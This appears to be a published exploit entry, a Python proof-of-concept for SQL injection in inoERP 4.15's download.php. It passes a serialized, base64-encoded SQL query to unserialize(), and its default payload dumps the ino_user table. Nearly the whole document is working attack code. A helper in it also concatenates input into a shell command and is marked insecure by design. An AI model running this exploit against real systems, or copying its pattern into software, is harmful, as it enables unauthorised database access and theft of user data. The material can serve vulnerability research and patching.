Share
# Exploit Title: inoERP 4.15 - 'download' SQL Injection  
# Date: 2019-09-13  
# Exploit Author: Semen Alexandrovich Lyhin  
# Vendor Homepage: http://inoideas.org/  
# Version: 4.15  
# CVE: N/A  
  
  
# A malicious query can be sent in base64 encoding to unserialize() function.   
# It can be deserialized as an array without any sanitization then.   
# After it, each element of the array is passed directly to the SQL query.   
  
  
#!/bin/python  
  
import os  
import base64  
import requests  
import sys  
  
def generatePayload(query):  
#THIS FUNCTION IS INSECURE BY DESIGN  
b64_query = base64.b64encode(query);  
return os.popen("php -r \"echo base64_encode(serialize(base64_decode('" + b64_query + "')));\"").read()  
  
  
def ExecSQL(query):  
data = {"data":query,  
"data_type":"sql_query"}  
  
r = requests.post("http://" + ip + "/download.php", data=data)  
return r.content  
  
  
if __name__ == "__main__":  
  
if len(sys.argv) != 3:  
print '(+) usage: %s <target> ' % sys.argv[0]  
print '(+) eg: %s 127.0.0.1 "ierp/" ' % sys.argv[0]  
exit()  
  
ip = sys.argv[1] + "/" + sys.argv[2]  
  
#if don't have php, set Payload to the next one to check this SQLi via "select @@version;" payload: czoxNzoic2VsZWN0IEBAdmVyc2lvbjsiOw==   
  
data = r"select * from ino_user;"  
  
print ExecSQL(generatePayload(data));